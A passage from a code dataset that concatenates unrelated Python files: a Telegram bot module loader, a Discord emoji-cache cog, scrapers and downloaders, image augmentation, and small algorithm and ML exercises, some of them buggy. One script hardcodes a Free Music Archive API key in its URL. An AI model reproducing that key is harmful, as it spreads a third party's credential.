get_module(module_name)\n\tif module is None:\n\t\traise ModuleNotFoundError(f\"Module {module_name} not found\")\n\n\twith self.modules_status_lock:\n\t\tif not module_name in self.modules_status:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\n\t\tif self.modules_status[module_name] == MODULE_STATUS_DISABLED:\n\t\t\traise AttributeError(\"Module is already disabled\")\n\n\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLING\n\n\t\ttry:\n\t\t\tfor command in module.commands:\n\t\t\t\tself.remove_handler(command.handler)\n\t\t\tmodule.remove_user(self.bot)\n\t\texcept:\n\t\t\tLOGE(f\"Failed to remove handler for module {module_name}\")\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ERROR\n\t\telse:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\t\t\tLOGI(f\"Module {module_name} disabled\")\n\nclass HomeBot(Updater):\n\tdef __init__(self, token: str):\n\t\tsuper().__init__(token=token)\n\n\t\tself.dispatcher.add_error_handler(error_handler, True)\n\n\t\tself.dispatcher.modules_status = {}\n\t\tself.dispatcher.modules_status_lock = Lock()\n\n\t\tself.dispatcher.enable_module = MethodType(enable_module, self.dispatcher)\n\t\tself.dispatcher.disable_module = MethodType(disable_module, self.dispatcher)\n\n\t\tfor module_name in get_all_modules_list():\n\t\t\tself.dispatcher.enable_module(module_name)\n","sub_path":"homebot/core/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"240585780","text":"from hashlib import md5\n\n\ndef solution(key, zeros='00000'):\n cnt = 0\n fmt = '{}{{}}'.format(key).format\n result = []\n while len(result) < 8:\n current = md5(fmt(cnt).encode()).hexdigest()\n if current.startswith(zeros):\n result.append(current[5])\n cnt += 1\n return ''.join(result)\n\n\ndef solution_2(key, zeros='00000'):\n cnt = 0\n fmt = '{}{{}}'.format(key).format\n free_slots = 8\n result = [None] * 8\n while free_slots:\n current = md5(fmt(cnt).encode()).hexdigest()\n if current.startswith(zeros):\n try:\n dex = int(current[5])\n if result[dex] is None:\n result[dex] = current[6]\n free_slots -= 1\n except (IndexError, ValueError):\n pass\n cnt += 1\n return ''.join(result)\n","sub_path":"2016/day_5.py","file_name":"day_5.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352051445","text":"from PIL import Image\nimport logging\nfrom pyscreenshot import imcodec\nfrom pyscreenshot.about import __version__\nfrom pyscreenshot.loader import Loader, FailedBackendError\nfrom pyscreenshot.procutil import run_in_childprocess\n\n\nADDITIONAL_IMPORTS=[FailedBackendError]\n\nlog = logging.getLogger(__name__)\nlog.debug('version=%s', __version__)\n\n\ndef _grab_simple(to_file, backend=None, bbox=None, filename=None, timeout=None):\n loader = Loader()\n loader.force(backend)\n backend_obj = loader.selected()\n\n if to_file:\n return backend_obj.grab_to_file(filename)\n else:\n return backend_obj.grab(bbox)\n\n\ndef _grab(to_file, childprocess=True, backend=None, bbox=None, filename=None, timeout=20):\n if childprocess:\n log.debug('running \"%s\" in child process', backend)\n return run_in_childprocess(_grab_simple, imcodec.codec, to_file, backend, bbox, filename, timeout=timeout)\n else:\n return _grab_simple(to_file, backend, bbox, filename)\n\n\ndef grab(bbox=None, childprocess=True, backend=None):\n \"\"\"Copy the contents of the 
screen to PIL image memory.\n\n :param bbox: optional bounding box (x1,y1,x2,y2)\n :param childprocess: pyscreenshot can cause an error,\n if it is used on more different virtual displays\n and back-end is not in different process.\n Some back-ends are always different processes: scrot, imagemagick\n :param backend: back-end can be forced if set (examples:scrot, wx,..),\n otherwise back-end is automatic\n\n \"\"\"\n return _grab(to_file=False, childprocess=childprocess, backend=backend, bbox=bbox)\n\n\ndef grab_to_file(filename, childprocess=True, backend=None, timeout=20, num_retries=0):\n \"\"\"Copy the contents of the screen to a file.\n\n :param filename: file for saving\n :param childprocess: see :py:func:`grab`\n :param backend: see :py:func:`grab`\n\n \"\"\"\n error = ''\n for turn in range(num_retries+1):\n try:\n return _grab(to_file=True, childprocess=childprocess, backend=backend, filename=filename, timeout=timeout)\n except Exception as e:\n error += str(e)\n raise Exception(error)\n\n\ndef backends():\n '''Back-end names as a list\n \n :return: back-ends as string list\n '''\n return Loader().all_names\n\n\ndef _backend_version(backend):\n loader = Loader()\n loader.force(backend)\n try:\n x = loader.selected()\n v = x.backend_version()\n except Exception:\n v = None\n return v\n\n\ndef backend_version(backend, childprocess=True):\n '''Back-end version\n\n :param backend: back-end (examples:scrot, wx,..)\n :param childprocess: see :py:func:`grab`\n :return: version as string\n '''\n if not childprocess:\n return _backend_version(backend)\n else:\n return run_in_childprocess(_backend_version, None, backend)\n","sub_path":"pyscreenshot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286167048","text":"from bs4 import BeautifulSoup, Comment\nimport requests\nimport shutil\n\n\ndef get_beautiful_soup(url):\n response = requests.get(url)\n bs = BeautifulSoup(response.text)\n return bs\n\n\ndef get_comments_bs(soup):\n comments = soup.findAll(text=lambda text: isinstance(text, Comment))\n return comments\n\n\ndef download_file(url):\n local_filename = url.split('/')[-1]\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.flush()\n return local_filename\n\n\ndef download_photo(url):\n response = requests.get(url, stream=True)\n file_name = url.split('/')[-1]\n with open(file_name, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"374684197","text":"import discord\nfrom discord.ext import commands\nimport os\nimport re\nimport aiofiles\nimport aiohttp\nfrom src.webhook import send_message\n\nEMOJI_DIR = 'emojis'\n\n\nclass emoji_manager():\n def __init__(self, client, guild):\n self.client = client\n self.guild = guild\n self._priorities = list(self.guild.emojis)\n if not os.path.exists(EMOJI_DIR + '/' + str(self.guild.id)):\n os.makedirs(EMOJI_DIR + '/' + str(self.guild.id))\n\n @property\n def max_emojis(self):\n maxes = (49, 99, 149, 249)\n return maxes[self.guild.premium_tier]\n\n def list_unloaded(self):\n loaded_names = [emoji.name for emoji in 
self.guild.emojis]\n return [n for n in os.listdir(f\"{EMOJI_DIR}/{self.guild.id}\") if n not in loaded_names] or ('No cached emojis',)\n\n async def clean(self):\n '''renames any emoji on the server that shares a name with an emoji on the disk or on the server'''\n return\n print(\"renaming dupes\")\n names = os.listdir(f\"{EMOJI_DIR}/{self.guild.id}\")\n for emoji in self.guild.emojis:\n if emoji.animated:\n continue\n count = 1\n name = emoji.name\n if name in names:\n while name + str(count) in names:\n count += 1\n print(\"renaming %s to %s\" % (emoji.name, emoji.name + str(count)))\n await emoji.edit(name=emoji.name + str(count))\n names.append(emoji.name)\n if len(self.guild.emojis) > self.max_emojis and False:\n print(\"caching one emoji...\")\n await self.guild.emojis[-1].delete(reason=\"cached\")\n\n async def scan(self, message):\n pattern = re.compile(r'(?:<:(?P<name>\w+):(?P<id>\d+)>)|(?::(?P<nameonly>\w+):)')\n emojis = pattern.finditer(message.content)\n for emojistr in emojis:\n if emojistr.group('nameonly'):\n try:\n emoji = await self.bump_emoji(emojistr.group('nameonly'))\n except Exception as e:\n print(e)\n continue\n if not emoji:\n continue\n self.client.deletable_messages.append(message.id)\n await message.delete()\n send_message(message.channel,\n message.content.replace(':%s:' % emojistr.group('nameonly'), str(emoji)),\n username=message.author.display_name,\n avatar_url=str(message.author.avatar_url).replace('webp', 'png')\n )\n print(str(message.author.avatar_url))\n break\n\n elif emojistr.group('name'):\n emoji = discord.utils.get(self.guild.emojis, id=emojistr.group('id'), name=emojistr.group('name'))\n if emoji:\n await self.bump_emoji(emoji)\n\n async def rename_emoji(self, before, after):\n print('renamed')\n await self.clean()\n\n async def add_emoji(self, emoji):\n '''call this when an emoji is added to the server'''\n await self.clean()\n print('added ' + str(emoji))\n if emoji in self._priorities:\n # this can happen if the emoji manager is instantiated after the emoji is added\n self._priorities.remove(emoji)\n if len(self.guild.emojis) > self.max_emojis:\n await self._save(self._priorities[-1])\n await self._priorities[-1].delete(reason=\"cached\")\n print(\"inserting\")\n self._priorities.insert(0, emoji)\n\n async def bump_emoji(self, emoji):\n '''call this when an emoji is used or requested'''\n print('bumped ' + str(emoji))\n if emoji in self.guild.emojis:\n i = self._priorities.index(emoji)\n if i != 0:\n self._priorities[i] = self._priorities[i - 1]\n self._priorities[i - 1] = emoji\n else:\n image = await self._load(emoji)\n return await self.guild.create_custom_emoji(name=emoji, image=image)\n\n def del_emoji(self, emoji):\n print('deleted ' + str(emoji))\n '''call this when an emoji is deleted (even if by the manager)'''\n self._priorities.remove(emoji)\n\n def _path(self, emoji):\n try:\n return \"%s/%s/%s\" % (EMOJI_DIR, self.guild.id, emoji.name)\n except Exception:\n return \"%s/%s/%s\" % (EMOJI_DIR, self.guild.id, emoji)\n\n async def _load(self, emoji):\n print('loaded ' + str(emoji))\n f = await aiofiles.open(self._path(emoji), 'rb')\n binary = await f.read()\n await f.close()\n # os.remove(self._path(emoji))\n return binary\n\n async def _save(self, emoji):\n print('saving ' + str(emoji) + ' from ' + str(emoji.url))\n '''load all emojis in the server into memory'''\n async with aiohttp.ClientSession() as session:\n async with session.get(str(emoji.url)) as resp:\n if resp.status == 200:\n f = await aiofiles.open(self._path(emoji), mode='wb')\n await 
f.write(await resp.read())\n await f.close()\n else:\n print(\"API gave unexpected response (%d) emoji not saved\" % resp.status)\n\n\nclass EmojiManagerCog(commands.Cog, name=\"Emoji Manager\"):\n '''\n Can be used to hotswap extra emojis into the server when the limit is reached\n must be enabled in settings\n '''\n\n def __init__(self, bot):\n self.bot = bot\n self._managers = None\n\n @property\n def managers(self):\n self._managers = self._managers or {guild.id: emoji_manager(self.bot, guild) for guild in self.bot.guilds}\n return self._managers\n\n @property\n def guild_settings(self):\n return self.bot.get_cog('GuildSettings')\n\n @commands.command(aliases=['emotes', 'emoji', 'emote'])\n async def emojis(self, ctx):\n '''\n List currently cached emojis.\n Enclose the name (case sensitive) of cached emoji in `:`s to auto-load it into a message\n '''\n settings = self.guild_settings.get_guild(ctx.guild)\n if not settings.manage_emojis:\n message = \"The emoji manager is disabled, you can enable it in `!settings`\"\n else:\n message = '```\\n • ' + '\\n • '.join(self.managers[ctx.guild.id].list_unloaded()) + '```\\n'\n message += \"Enclose the name (case sensitive) of cached emoji in `:`s to auto-load it into a message\"\n\n await ctx.channel.send(message)\n\n @commands.Cog.listener()\n async def on_message(self, message):\n settings = self.guild_settings.get_guild(message.guild)\n if settings.manage_emojis:\n await self.managers[message.guild.id].scan(message)\n\n @commands.Cog.listener()\n async def on_guild_emojis_update(self, guild, before, after):\n settings = self.guild_settings.get_guild(guild)\n if not settings.manage_emojis:\n return\n\n if len(before) == len(after): # if renamed\n diff = [i for i in range(len(after)) if before[i].name != after[i].name and not before[i].animated]\n for i in diff:\n await self.managers[guild.id].rename_emoji(before[i], after[i])\n\n elif len(before) > len(after): # if removed\n for emoji in (emoji for emoji in before if emoji not in after and not emoji.animated):\n self.managers[guild.id].del_emoji(emoji)\n\n elif len(after) > len(before): # if added\n for emoji in (emoji for emoji in after if emoji not in before and not emoji.animated):\n await self.managers[guild.id].add_emoji(emoji)\n\n\ndef setup(bot):\n bot.add_cog(EmojiManagerCog(bot))\n","sub_path":"src/emoji_manager.py","file_name":"emoji_manager.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"277203021","text":"\"\"\"\nGiven a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).\n\nFor example, this binary tree [1,2,2,3,4,4,3] is symmetric:\n 1\n / \\\n 2 2\n / \\ / \\\n3 4 4 3\n\n\nBut the following [1,2,2,null,3,null,3] is not:\n 1\n / \\\n 2 2\n \\ \\\n 3 3\n\"\"\"\nimport collections\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.left = None\n self.right = None\n self.val = val\n\n\ndef is_symmetric(self, root):\n def is_mirror(l, r):\n if not l and not r:\n return True\n if not l or not r:\n return False\n elif l.val == r.val:\n return is_mirror(l.left, r.right) and is_mirror(l.right, r.left)\n return False\n\n return is_mirror(root, root)\n\n\ndef is_symmetric_iterative(self, root):\n # Each iteration, it checks whether two nodes are symmetric and then push (node1.left, node2.right),\n # (node1.right, node2.left) to the end of queue.\n if not root:\n return True\n\n dq = collections.deque([(root.left, 
root.right)],)\n while dq:\n node1, node2 = dq.popleft()\n if not node1 and not node2:\n continue\n elif not node1 or not node2:\n return False\n elif node1.val != node2.val:\n return False\n\n # node1.left and node2.right are symmetric nodes in structure\n # node1.right and node2.left are symmetric nodes in structure\n dq.append((node1.left, node2.right))\n dq.append((node1.right, node2.left))\n\n return True\n\n\ndef main():\n print(is_symmetric([1, 2, 2, 3, 4, 4, 3]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Tree/SymmetricTree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286776032","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 8 11:58:05 2021\r\n\r\n@author: Divy\r\n\"\"\"\r\nimport random\r\nfrom scipy import ndarray\r\nimport skimage as sk\r\nfrom skimage import transform\r\nfrom skimage import util\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport os.path\r\nimport skimage.io as sio\r\nfrom random import sample\r\n\r\ndef remove_data(folder_path,num_rem):\r\n files = os.listdir(folder_path)\r\n for file in sample(files,num_rem):\r\n os.remove(folder_path+file)\r\n\r\ndef augment_data(folder_path,num_files_desired):\r\n def random_rotation(image_array: ndarray):\r\n # pick a random degree of rotation between 25% on the left and 25% on the right\r\n random_degree = random.uniform(-25, 25)\r\n return sk.transform.rotate(image_array, random_degree)\r\n\r\n def horizontal_flip(image_array: ndarray):\r\n # horizontal flip doesn't need skimage, it's easy as flipping the image array of pixels !\r\n return image_array[:, ::-1]\r\n\r\n def random_noise(image):\r\n noise_list = [\"gauss\",\"s&p\",\"poisson\",\"speckle\"]\r\n noise_typ = random.choice(noise_list)\r\n if noise_typ == \"gauss\":\r\n row,col,ch= image.shape\r\n mean = 0\r\n var = 0.1\r\n sigma = var**0.5\r\n gauss = np.random.normal(mean,sigma,(row,col,ch))\r\n gauss = gauss.reshape(row,col,ch)\r\n noisy = image + gauss\r\n return noisy\r\n elif noise_typ == \"s&p\":\r\n row,col,ch = image.shape\r\n s_vs_p = 0.5\r\n amount = 0.004\r\n out = np.copy(image)\r\n # Salt mode\r\n num_salt = np.ceil(amount * image.size * s_vs_p)\r\n coords = [np.random.randint(0, i - 1, int(num_salt))\r\n for i in image.shape]\r\n out[coords] = 1\r\n \r\n # Pepper mode\r\n num_pepper = np.ceil(amount* image.size * (1. 
- s_vs_p))\r\n coords = [np.random.randint(0, i - 1, int(num_pepper))\r\n for i in image.shape]\r\n out[coords] = 0\r\n return out\r\n elif noise_typ == \"poisson\":\r\n vals = len(np.unique(image))\r\n vals = 2 ** np.ceil(np.log2(vals))\r\n noisy = np.random.poisson(image * vals) / float(vals)\r\n return noisy\r\n elif noise_typ ==\"speckle\":\r\n row,col,ch = image.shape\r\n gauss = np.random.randn(row,col,ch)\r\n gauss = gauss.reshape(row,col,ch) \r\n noisy = image + image * gauss\r\n return noisy\r\n \r\n path, dirs, files = next(os.walk(folder_path))\r\n images = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if os.path.isfile(os.path.join(folder_path, f))]\r\n num_generated_files = 0\r\n while num_generated_files <= num_files_desired:\r\n # random image from the folder\r\n image_path = random.choice(images)\r\n # read image as an two dimensional array of pixels\r\n image_to_transform = sio.imread(image_path)\r\n num_generated_files += 1\r\n \r\n # dictionary of the transformations functions we defined earlier\r\n available_transformations = {\r\n 'rotate': random_rotation,\r\n 'noise': random_noise,\r\n 'horizontal_flip': horizontal_flip\r\n }\r\n \r\n # random num of transformations to apply\r\n num_transformations_to_apply = random.randint(1, len(available_transformations))\r\n \r\n num_transformations = 0\r\n transformed_image = None\r\n while num_transformations <= num_transformations_to_apply:\r\n # choose a random transformation to apply for a single image\r\n key = random.choice(list(available_transformations))\r\n transformed_image = available_transformations[key](image_to_transform)\r\n num_transformations += 1\r\n\r\n\r\n # define a name for our new file\r\n # print(image_path)\r\n new_file_path = '%s/augmented_image_%s.jpg' % (folder_path, num_generated_files)\r\n \r\n # write image to the disk\r\n transformed_image = transformed_image.astype(np.uint8)\r\n sk.io.imsave(new_file_path, transformed_image)\r\n\r\n \r\n \r\n \r\n\r\nparent_folder_path = \"Data1H(with-noise)\"\r\npath, dirss, files = next(os.walk(parent_folder_path))\r\ntotal_files_req = 800\r\nfor s in dirss:\r\n folder_path = f\"{parent_folder_path}/{s}/\"\r\n # print(folder_path)\r\n path, dirs, files = next(os.walk(folder_path))\r\n file_count = len(files)\r\n if file_count > total_files_req:\r\n num_rem = file_count - total_files_req\r\n remove_data(folder_path, num_rem)\r\n elif file_count < total_files_req:\r\n num_files_desired = total_files_req-file_count-1\r\n augment_data(folder_path,num_files_desired)","sub_path":"data_aug_rem.py","file_name":"data_aug_rem.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143717482","text":"from urllib import request\nimport re\nfrom os import fork\n\n\ndef get_file(url,fname):\n html=request.urlopen(url)\n with open(fname,'wb') as fobj:\n while True:\n data=html.read(1024)\n if not data:\n break\n fobj.write(data)\n\ndef get_urls(patt,fname,charset='utf8'):\n url_list=[]\n cpatt=re.compile(patt)\n with open(fname, encoding=charset) as fobj:\n for line in fobj:\n m = cpatt.search(line)\n if m:\n url_list.append(m.group())\n\n return url_list\n\nif __name__ == '__main__':\n url_163=\"http://www.163.com\"\n fname_163=\"/tmp/163.html\"\n get_file(url_163,fname_163)\n img_patt=\"(http|https)://[\\w./]+\\.(jpg|jpeg|gif|png)\"\n ulist = get_urls(img_patt,fname_163,'GBK')\n # print(ulist)\n for img in ulist:\n imgname=re.split('/',img)[-1]\n 
get_file(img,\"/tmp/img/\"+imgname)\n # print(imgname)\n # pid=fork()\n","sub_path":"n3_devops/day03/no1_get_163img.py","file_name":"no1_get_163img.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241591532","text":"#!/usr/bin/env python\nimport requests\nimport os, sys\n\nsys.path.append(\"..\")\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", 'project.settings')\n\nfrom app.models import Genre\n\nresponse = requests.get('https://freemusicarchive.org/api/get/genres.json?api_key=OVKCLNSMSGB35I89&limit=170')\n\nresponse_dict = response. json()\n\nfor data in response_dict['dataset']:\n new_genre, created = Genre.objects.get_or_create(genre_id=data['genre_id'])\n new_genre.genre_title = data['genre_title']\n new_genre.genre_handle = data['genre_handle']\n new_genre.genre_parent_id = data['genre_parent_id']\n\n new_genre.save()\n","sub_path":"scripts/genre_populator.py","file_name":"genre_populator.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86830602","text":"#%%\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv(r'C:\\Users\\pankaj.sanwal\\Desktop\\PythonStuff\\Python-Data-Science-and-Machine-Learning-Bootcamp\\Python-Data-Science-and-Machine-Learning-Bootcamp\\Machine Learning Sections\\Decision-Trees-and-Random-Forests\\loan_data.csv')\ndf.head(200)\n#%%\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nplt.figure(figsize=(15,10))\n#%%\nsns.countplot(df['purpose'], hue=df['not.fully.paid'])\n#%%\nsns.countplot(df['not.fully.paid'])\n#%%\nsns.distplot(df[df['credit.policy']==1]['fico'],bins=30,kde=False,label='credit.policy=1')\nsns.distplot(df[df['credit.policy']==0]['fico'],bins=30,kde=False,label='credit.policy=0')\nplt.legend()\n#%%\nsns.distplot(df[df['not.fully.paid']==1]['fico'],bins=30,kde=False,label='not.fully.paid=1')\nsns.distplot(df[df['not.fully.paid']==0]['fico'],bins=30,kde=False,label='not.fully.paid=0')\nplt.legend()\n#%%\nsns.jointplot(df['fico'],df['int.rate'])\n#%%\nsns.lmplot(data=df,x='fico',y='int.rate',hue='credit.policy',col='not.fully.paid')\n#%%\nfinal_data = pd.get_dummies(data=df,columns=['purpose'],drop_first=True)\nfinal_data.info()\n#%%\nfrom sklearn.model_selection import train_test_split\nx=final_data.drop('not.fully.paid',axis=1)\ny=final_data['not.fully.paid']\nx_train,x_test, y_train, y_test = train_test_split(x,y,test_size=0.3,random_state=101)\n#%%\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix\ndt = DecisionTreeClassifier()\ndt.fit(x_train,y_train)\ndt_preditc = dt.predict(x_test)\n#%%\nprint(classification_report(y_test,dt_preditc))\n#%%\nprint(confusion_matrix(y_test,dt_preditc))\n#%%\nrf = RandomForestClassifier(n_estimators=200)\nrf.fit(x_train,y_train)\nrf_predict = rf.predict(x_test)\n#%%\nprint(classification_report(y_test,rf_predict))\n#%%\nprint(confusion_matrix(y_test,rf_predict))\n\n\n\n\n\n","sub_path":"ML_Algos/DT_RF_Exercise.py","file_name":"DT_RF_Exercise.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41375901","text":"# Given an array of integers, every element appears twice except for one.\n# Implement a program that will print that single one.\n\n# Example: [1,1,2,2,3,3,4,5,5,6,6,7,7] - 
4 would be the odd man out\n\n# Note:\n# Your algorithm should have a linear runtime complexity.\n\n\n# *** your code here ***\ntest = [1,2,1,2,3,7,3,5,5,6,7,4,6]\n\ndef singler(arr):\n arr.sort()\n while (arr[len(arr) - 1] == arr[len(arr) - 2]):\n arr.pop()\n arr.pop()\n print(arr[len(arr)-1], \" is the loneliest number\")\nsingler(test)\n","sub_path":"single_one.py","file_name":"single_one.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"263731534","text":"\"\"\"\nBindings common module that contains common code for skeletons and stubs\n\"\"\"\n__author__ = 'VMware, Inc.'\n__copyright__ = 'Copyright 2015 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long\n\n\nfrom vmware.vapi.exception import CoreException\n\n\ndef raise_core_exception(msg_list):\n \"\"\"\n Create and raise a CoreException from a list of messages\n\n :type msg_list: :class:`vmware.vapi.message.Message`\n :param msg_list: List of messages\n\n :raise: CoreException if msg list is not empty\n \"\"\"\n exception = None\n if msg_list:\n for msg in reversed(msg_list):\n if exception:\n exception = CoreException(msg, cause=exception)\n else:\n exception = CoreException(msg)\n if exception is not None:\n raise exception # pylint: disable-msg=E0702\n\n\nclass NameToTypeResolver(object):\n \"\"\"\n Helper class that resolves a fully qualified canonical type name to a type\n descriptor. The type name can be a structure name or an error name.\n \"\"\"\n def __init__(self, type_map):\n \"\"\"\n Initialize NameToTypeResolver\n\n :type type_map: :class:`dict` of :class:`str` and :class:`VapiStruct`\n :param type_map: Type map that contains the canonical names and the\n references to the binding classes for these types.\n \"\"\"\n self._type_map = type_map\n\n def resolve(self, name):\n \"\"\"\n Type name to be resolved\n \"\"\"\n return self._type_map.get(name)\n","sub_path":"alexa-program/vmware/vapi/bindings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"342578108","text":"from typing import List\n\n\nclass Solution:\n def numEnclaves(self, A: List[List[int]]) -> int:\n m, n = len(A), len(A[0])\n szs = [1 for _ in range(m * n)]\n ids = [i for i in range(m * n)]\n\n def find(var1):\n if ids[var1] == var1:\n return var1\n return find(ids[var1])\n\n def union(v1, v2):\n i1, i2 = find(v1), find(v2)\n big, small = (i1, i2) if szs[i1] > szs[i2] else (i2, i1)\n szs[big] += szs[small]\n ids[small] = ids[big]\n\n def idof(i, j):\n nonlocal m, n\n return i * n + j\n\n visited = set()\n\n def isvalid(i, j):\n nonlocal m, n\n return 0 <= i < m and 0 <= j < n and A[i][j] == 1 and (i, j) not in visited\n\n ds = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n def helper(i, j):\n nonlocal m, n\n if not isvalid(i, j):\n return\n visited.add((i, j))\n for d in ds:\n ni, nj = d[0] + i, d[1] + j\n if isvalid(ni, nj):\n union(idof(i, j), idof(ni, nj))\n helper(ni, nj)\n\n for i in range(m):\n helper(i, 0)\n helper(i, n - 1)\n\n for i in range(n):\n helper(0, i)\n helper(m - 1, i)\n\n tot = 0\n for i in range(m):\n for j in range(n):\n tot += 1 if A[i][j] == 1 else 0\n\n return tot - len(visited)\n","sub_path":"src/graph/unionfind/lc1020.py","file_name":"lc1020.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"156336218","text":"\n\nfrom xai.brain.wordbase.adjectives._marsupial import _MARSUPIAL\n\n#calss header\nclass _MARSUPIALS(_MARSUPIAL, ):\n\tdef __init__(self,): \n\t\t_MARSUPIAL.__init__(self)\n\t\tself.name = \"MARSUPIALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"marsupial\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_marsupials.py","file_name":"_marsupials.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2655769","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nx_data = np.random.rand(100).astype(np.float32)\ny_data = x_data*0.1 + 0.3\n\n### create tensorflow structure start ###\nWeights = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nbiases = tf.Variable(tf.zeros([1]))\ny = Weights*x_data + biases \t\t\n\n### how to optimize result by Gradient under learning rate\nloss = tf.reduce_mean(tf.square(y-y_data))\t\t# this is a number\noptimizer = tf.train.GradientDescentOptimizer(0.5)\t\t# this is a optimizer\ntrain = optimizer.minimize(loss)\t\t# train is handler of this minimize function\n\n### create tensorflow structure end ###\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor step in range(201):\n sess.run(train)\n if step % 10 == 0:\n print(step, sess.run(Weights), sess.run(biases))\nsess.close() \n","sub_path":"tutorial_moFan/simple_version/Lecture5.py","file_name":"Lecture5.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88839442","text":"'''\n题目:一个数如果恰好等于它的因子之和,这个数就称为\"完数\"。\n例如6=1+2+3.编程找出1000以内的所有完数。\n因子:所有的因数\n'''\nfor i in range(2,1000):\n l = []\n s = 0\n for j in range(1,i):\n if (i % j == 0):\n l.append(j)\n if l: # 不为空\n for k in l:\n s += k\n if (s == i):\n print(i)\n for m in l:\n print(\"%d \" % m,end=\"\")\n print()\n","sub_path":"python100例/16_求完数.py","file_name":"16_求完数.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494191509","text":"#-*-coding:utf-8-*-\n\nimport sklearn.metrics\nimport cv2\nimport time\nimport os\n\n\nfrom lib.core.utils.torch_utils import EMA\nfrom train_config import config as cfg\n#from lib.dataset.dataietr import DataIter\n\nimport sklearn.metrics\nfrom lib.helper.logger import logger\n\nfrom lib.core.model.ShuffleNet_Series.ShuffleNetV2.utils import accuracy, AvgrageMeter, CrossEntropyLabelSmooth, save_checkpoint, get_lastest_model, get_parameters\nfrom lib.core.model.loss.focal_loss import FocalLoss,FocalLoss4d\nfrom lib.core.base_trainer.model import Net\n\nimport random\n\nfrom lib.core.base_trainer.metric import *\nimport torch\nimport torch.nn.functional as F\n\nfrom torchcontrib.optim import SWA\n\n\nfrom lib.core.model.mix.mix import cutmix,cutmix_criterion\n\n\n\nif cfg.TRAIN.mix_precision:\n from apex import amp\n\nclass Train(object):\n \"\"\"Train class.\n \"\"\"\n\n def __init__(self,train_ds,val_ds,fold):\n self.fold=fold\n\n self.init_lr=cfg.TRAIN.init_lr\n self.warup_step=cfg.TRAIN.warmup_step\n self.epochs = cfg.TRAIN.epoch\n self.batch_size = cfg.TRAIN.batch_size\n self.l2_regularization=cfg.TRAIN.weight_decay_factor\n\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n\n\n self.model = Net().to(self.device)\n\n self.load_weight()\n\n param_optimizer = 
